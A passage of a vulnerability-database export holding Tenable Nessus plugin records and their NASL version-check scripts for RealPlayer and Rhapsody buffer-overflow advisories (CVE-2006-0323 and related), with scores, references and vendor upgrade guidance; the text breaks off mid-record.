According to its build number, the installed version of RealPlayer / RealOne Player / RealPlayer Enterprise on the remote Windows host suffers from one or more buffer overflows involving maliciously- crafted SWF and MBC files as well as web pages. In addition, it also may be affected by a local privilege escalation issue.
{"id": "REALPLAYER_6_0_12_1483.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "RealPlayer for Windows < Build 6.0.12.1483 Multiple Vulnerabilities", "description": "According to its build number, the installed version of RealPlayer / RealOne Player / RealPlayer Enterprise on the remote Windows host suffers from one or more buffer overflows involving maliciously- crafted SWF and MBC files as well as web pages. In addition, it also may be affected by a local privilege escalation issue.", "published": "2006-03-24T00:00:00", "modified": "2018-07-25T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/21140", "reporter": "This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2922", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1370", "http://service.real.com/realplayer/security/03162006_player/en/", "http://www.nessus.org/u?1d16d359", "http://www.nessus.org/u?c0b66183", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2936"], "cvelist": ["CVE-2005-2922", "CVE-2005-2936", "CVE-2006-0323", "CVE-2006-1370"], "immutableFields": [], "lastseen": "2023-05-18T14:16:34", "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "centos", "idList": ["CESA-2005:788"]}, {"type": "cert", "idList": ["VU:172489", "VU:231028", "VU:451556"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2006-211"]}, {"type": "cve", "idList": ["CVE-2005-2922", "CVE-2005-2936", "CVE-2006-0323", "CVE-2006-1370"]}, {"type": "exploitdb", "idList": ["EDB-ID:27460"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:13F7868B04FD8DDB92761B19FD8AB565", "EXPLOITPACK:2B9A593CB682A18F23FA908F3143E367"]}, {"type": "freebsd", "idList": ["25858C37-BDAB-11DA-B7D4-00123FFE8333", "FE4C84FC-BDB5-11DA-B7D4-00123FFE8333"]}, {"type": "gentoo", "idList": ["GLSA-200603-24"]}, {"type": "kaspersky", "idList": ["KLA10310"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2005-788.NASL", "FREEBSD_PKG_25858C37BDAB11DAB7D400123FFE8333.NASL", "FREEBSD_PKG_FE4C84FCBDB511DAB7D400123FFE8333.NASL", "GENTOO_GLSA-200603-24.NASL", "REDHAT-RHSA-2005-762.NASL", "REDHAT-RHSA-2005-788.NASL", "REDHAT-RHSA-2006-0257.NASL", "RHAPSODY_3_1_0_270.NASL", "SUSE_SA_2006_018.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:56446", "OPENVAS:56447", "OPENVAS:56552"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:45093"]}, {"type": "redhat", "idList": ["RHSA-2005:762", "RHSA-2005:788", "RHSA-2006:0257"]}, {"type": "saint", "idList": ["SAINT:32AF98CF80A27AB194B608D45186A636", "SAINT:74F1BEDE6E32D2B82819435F2160B116", "SAINT:7A58BDE9BDCCED73750F291E450DEC53", "SAINT:CB07D6C943AA2B34E7B85CB005E75063"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:10252", "SECURITYVULNS:DOC:11910", "SECURITYVULNS:DOC:11925", "SECURITYVULNS:DOC:12161"]}, {"type": "seebug", "idList": ["SSV:15954", "SSV:63442", "SSV:7738", "SSV:81069"]}, {"type": "suse", "idList": ["SUSE-SA:2006:018"]}]}, "score": {"value": 6.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "centos", "idList": ["CESA-2005:788"]}, {"type": "cert", "idList": ["VU:451556"]}, {"type": "cve", "idList": ["CVE-2005-2922", "CVE-2005-2936", "CVE-2006-0323", "CVE-2006-1370"]}, {"type": "exploitdb", "idList": ["EDB-ID:27460"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:13F7868B04FD8DDB92761B19FD8AB565"]}, {"type": "freebsd", "idList": ["25858C37-BDAB-11DA-B7D4-00123FFE8333", "FE4C84FC-BDB5-11DA-B7D4-00123FFE8333"]}, {"type": "gentoo", "idList": ["GLSA-200603-24"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_25858C37BDAB11DAB7D400123FFE8333.NASL", "REALPLAYER_DETECT.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:56447"]}, {"type": "redhat", "idList": ["RHSA-2005:788"]}, {"type": "saint", "idList": ["SAINT:32AF98CF80A27AB194B608D45186A636"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:10252"]}, {"type": "seebug", "idList": ["SSV:7738"]}, {"type": "suse", "idList": ["SUSE-SA:2006:018"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2005-2922", "epss": 0.02392, "percentile": 0.88263, "modified": "2023-05-06"}, {"cve": "CVE-2005-2936", "epss": 0.00176, "percentile": 0.53208, "modified": "2023-05-06"}, {"cve": "CVE-2006-0323", "epss": 0.96869, "percentile": 0.99498, "modified": "2023-05-06"}, {"cve": "CVE-2006-1370", "epss": 0.03427, "percentile": 0.90055, "modified": "2023-05-06"}], "vulnersScore": 6.6}, "_state": {"dependencies": 1684423147, "score": 1684424289, "epss": 0}, "_internal": {"score_hash": "d4bc61c48448f157e4abfde7d58f7d49"}, "pluginID": "21140", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21140);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2005-2922\", \"CVE-2005-2936\", \"CVE-2006-0323\", \"CVE-2006-1370\");\n script_bugtraq_id(15448, 17202);\n\n script_name(english:\"RealPlayer for Windows < Build 6.0.12.1483 Multiple Vulnerabilities\");\n script_summary(english:\"Checks RealPlayer build number\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows application is affected by several issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"According to its build number, the installed version of RealPlayer /\nRealOne Player / RealPlayer Enterprise on the remote Windows host\nsuffers from one or more buffer overflows involving maliciously-\ncrafted SWF and MBC files as well as web pages. In addition, it also\nmay be affected by a local privilege escalation issue.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d16d359\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c0b66183\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://service.real.com/realplayer/security/03162006_player/en/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade according to the vendor advisory referenced above.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/03/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/11/15\");\n script_cvs_date(\"Date: 2018/07/25 18:58:06\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2006/03/16\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:realnetworks:realplayer\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"realplayer_detect.nasl\");\n script_require_keys(\"SMB/RealPlayer/Product\", \"SMB/RealPlayer/Build\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\n# nb: RealOne Player and RealPlayer Enterprise are also affected,\n# but we don't currently know which specific build numbers\n# address the issues.\nprod = get_kb_item(\"SMB/RealPlayer/Product\");\nif (!prod || prod != \"RealPlayer\") exit(0);\n\n\n# Check build.\nbuild = get_kb_item(\"SMB/RealPlayer/Build\");\nif (!build) exit(0);\n\n# There's a problem if the build is before 6.0.12.1483.\nver = split(build, sep:'.', keep:FALSE);\nif (\n int(ver[0]) < 6 ||\n (\n int(ver[0]) == 6 &&\n int(ver[1]) == 0 && \n (\n int(ver[2]) < 12 ||\n (int(ver[2]) == 12 && int(ver[3]) < 1483)\n )\n )\n)\n{\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n prod, \" build \", build, \" is installed on the remote host.\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\n", "naslFamily": "Windows", "cpe": ["cpe:/a:realnetworks:realplayer"], "solution": "Upgrade according to the vendor advisory referenced above.", "nessusSeverity": "High", "cvssScoreSource": "", "vendor_cvss2": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "vendor_cvss3": {"score": null, "vector": null}, "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2006-03-16T00:00:00", "vulnerabilityPublicationDate": "2005-11-15T00:00:00", "exploitableWith": []}
{"suse": [{"lastseen": "2021-06-08T18:40:21", "description": "This update fixes the following security problems in Realplayer:\n#### Solution\nThere is no known workaround, please install the update packages.", "cvss3": {}, "published": "2006-03-23T12:04:47", "type": "suse", "title": "remote code execution in RealPlayer", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2005-2922", "CVE-2006-0323"], "modified": "2006-03-23T12:04:47", "id": "SUSE-SA:2006:018", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-03/msg00016.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2022-03-27T14:44:42", "description": "The remote host is missing the patch for the advisory SUSE-SA:2006:018 (RealPlayer).\n\n\nThis update fixes the following security problems in Realplayer:\n\n- Specially crafted SWF files could cause a buffer overflow and crash RealPlayer (CVE-2006-0323).\n\n- Specially crafted web sites could cause heap overflow and lead to executing arbitrary code (CVE-2005-2922). This was already fixed with the previously released 1.0.6 version, but not announced on request of Real.\n\nThe advisory for these problems is on this page at Real:\nhttp://service.real.com/realplayer/security/03162006_player/en/\n\nSUSE Linux 9.2 up to 10.0 and Novell Linux Desktop 9 are affected by this problem and receive fixed packages.\n\nIf you are still using Realplayer on SUSE Linux 9.1 or SUSE Linux Desktop 1, we again wish to remind you that the Real player on these products cannot be updated and recommend to deinstall it.", "cvss3": {}, "published": "2006-03-27T00:00:00", "type": "nessus", "title": "SUSE-SA:2006:018: RealPlayer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2922", "CVE-2006-0323"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "SUSE_SA_2006_018.NASL", "href": "https://www.tenable.com/plugins/nessus/21150", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2006:018\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(21150);\n script_version(\"1.9\");\n \n name[\"english\"] = \"SUSE-SA:2006:018: RealPlayer\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2006:018 (RealPlayer).\n\n\nThis update fixes the following security problems in Realplayer:\n\n- Specially crafted SWF files could cause a buffer overflow and\ncrash RealPlayer (CVE-2006-0323).\n\n- Specially crafted web sites could cause heap overflow and lead to\nexecuting arbitrary code (CVE-2005-2922). This was already fixed\nwith the previously released 1.0.6 version, but not announced on\nrequest of Real.\n\nThe advisory for these problems is on this page at Real:\nhttp://service.real.com/realplayer/security/03162006_player/en/\n\nSUSE Linux 9.2 up to 10.0 and Novell Linux Desktop 9 are affected by\nthis problem and receive fixed packages.\n\nIf you are still using Realplayer on SUSE Linux 9.1 or SUSE Linux\nDesktop 1, we again wish to remind you that the Real player on these\nproducts cannot be updated and recommend to deinstall it.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/advisories/2006_18_realplayer.html\" );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\" );\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/03/27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the RealPlayer package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"RealPlayer-10.0.7-0.1\", release:\"SUSE10.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"RealPlayer-10.0.7-0.1\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"RealPlayer-10.0.7-0.1\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:28", "description": "Secunia Advisories Reports :\n\nA boundary error when processing SWF files can be exploited to cause a buffer overflow. This may allow execution of arbitrary code on the user's system.", "cvss3": {}, "published": "2006-05-13T00:00:00", "type": "nessus", "title": "FreeBSD : linux-realplayer -- buffer overrun (25858c37-bdab-11da-b7d4-00123ffe8333)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-realplayer"], "id": "FREEBSD_PKG_25858C37BDAB11DAB7D400123FFE8333.NASL", "href": "https://www.tenable.com/plugins/nessus/21402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21402);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-0323\");\n script_xref(name:\"Secunia\", value:\"19358\");\n\n script_name(english:\"FreeBSD : linux-realplayer -- buffer overrun (25858c37-bdab-11da-b7d4-00123ffe8333)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Secunia Advisories Reports :\n\nA boundary error when processing SWF files can be exploited to cause a\nbuffer overflow. This may allow execution of arbitrary code on the\nuser's system.\"\n );\n # http://service.real.com/realplayer/security/03162006_player/en/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.real.com/\"\n );\n # https://vuxml.freebsd.org/freebsd/25858c37-bdab-11da-b7d4-00123ffe8333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8e3534bb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-realplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/03/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-realplayer>=10.0.1<10.0.7.785.20060201\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:16:35", "description": "The remote host is affected by the vulnerability described in GLSA-200603-24 (RealPlayer: Buffer overflow vulnerability)\n\n RealPlayer is vulnerable to a buffer overflow when processing malicious SWF files.\n Impact :\n\n By enticing a user to open a specially crafted SWF file an attacker could execute arbitrary code with the permissions of the user running the application.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2006-03-27T00:00:00", "type": "nessus", "title": "GLSA-200603-24 : RealPlayer: Buffer overflow vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:realplayer", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200603-24.NASL", "href": "https://www.tenable.com/plugins/nessus/21148", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200603-24.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21148);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-0323\");\n script_xref(name:\"GLSA\", value:\"200603-24\");\n\n script_name(english:\"GLSA-200603-24 : RealPlayer: Buffer overflow vulnerability\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200603-24\n(RealPlayer: Buffer overflow vulnerability)\n\n RealPlayer is vulnerable to a buffer overflow when processing\n malicious SWF files.\n \nImpact :\n\n By enticing a user to open a specially crafted SWF file an\n attacker could execute arbitrary code with the permissions of the user\n running the application.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://service.real.com/realplayer/security/03162006_player/en/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.real.com/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200603-24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All RealPlayer users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/realplayer-10.0.7'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:realplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-video/realplayer\", unaffected:make_list(\"ge 10.0.7\"), vulnerable:make_list(\"lt 10.0.7\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"RealPlayer\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:16:29", "description": "According to its version number, the installed version of Rhapsody on the remote host suffers from a buffer overflow involving SWF files. To exploit this issue, a remote attacker needs to convince a user to attempt to play a maliciously crafted SWF file using the affected application.", "cvss3": {}, "published": "2006-03-24T00:00:00", "type": "nessus", "title": "Rhapsody SWF File Handling Buffer Overflow", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2018-08-22T00:00:00", "cpe": [], "id": "RHAPSODY_3_1_0_270.NASL", "href": "https://www.tenable.com/plugins/nessus/21141", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21141);\n script_version(\"1.15\");\n\n script_cve_id(\"CVE-2006-0323\");\n script_bugtraq_id(17202);\n\n script_name(english:\"Rhapsody SWF File Handling Buffer Overflow\");\n script_summary(english:\"Checks version of Rhapsody\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows application is affected by a buffer overflow flaw.\" );\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the installed version of Rhapsody on\nthe remote host suffers from a buffer overflow involving SWF files. \nTo exploit this issue, a remote attacker needs to convince a user to\nattempt to play a maliciously crafted SWF file using the affected\napplication.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://service.real.com/realplayer/security/03162006_player/en/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Rhapsody 3 build 1.0.270 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/03/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/03/22\");\n script_cvs_date(\"Date: 2018/08/22 16:49:14\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencie(\"rhapsody_detect.nasl\");\n script_require_keys(\"SMB/Rhapsody/Version\");\n\n exit(0);\n}\n\n\n# Check version of Rhapsody.\nver = get_kb_item(\"SMB/Rhapsody/Version\");\nif (!ver) exit(0);\n\n# There's a problem if it's version [3.0.0.815, 3.1.0.270).\niver = split(ver, sep:'.', keep:FALSE);\nif (\n int(iver[0]) == 3 &&\n (\n (int(iver[1]) == 0 && int(iver[2]) == 0 && int(iver[3]) >= 815) ||\n (int(iver[1]) == 1 && int(iver[2]) == 0 && int(iver[3]) < 270)\n )\n) security_hole(get_kb_item(\"SMB/transport\"));\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:57", "description": "An updated RealPlayer package that fixes a buffer overflow bug is now available for Red Hat Enterprise Linux Extras 3 and 4.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nRealPlayer is a media player that provides media playback locally and via streaming.\n\nA buffer overflow bug was discovered in the way RealPlayer processes Flash Media (.swf) files. It is possible for a malformed Flash Media file to execute arbitrary code as the user running RealPlayer. The Common Vulnerabilities and Exposures project assigned the name CVE-2006-0323 to this issue.\n\nAll users of RealPlayer are advised to upgrade to this updated package, which contains RealPlayer version 10.0.7 and is not vulnerable to this issue.", "cvss3": {}, "published": "2013-01-24T00:00:00", "type": "nessus", "title": "RHEL 3 / 4 : RealPlayer (RHSA-2006:0257)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:realplayer", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2006-0257.NASL", "href": "https://www.tenable.com/plugins/nessus/63831", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0257. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63831);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-0323\");\n script_xref(name:\"RHSA\", value:\"2006:0257\");\n\n script_name(english:\"RHEL 3 / 4 : RealPlayer (RHSA-2006:0257)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated RealPlayer package that fixes a buffer overflow bug is now\navailable for Red Hat Enterprise Linux Extras 3 and 4.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nRealPlayer is a media player that provides media playback locally and\nvia streaming.\n\nA buffer overflow bug was discovered in the way RealPlayer processes\nFlash Media (.swf) files. It is possible for a malformed Flash Media\nfile to execute arbitrary code as the user running RealPlayer. The\nCommon Vulnerabilities and Exposures project assigned the name\nCVE-2006-0323 to this issue.\n\nAll users of RealPlayer are advised to upgrade to this updated\npackage, which contains RealPlayer version 10.0.7 and is not\nvulnerable to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2006-0323.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 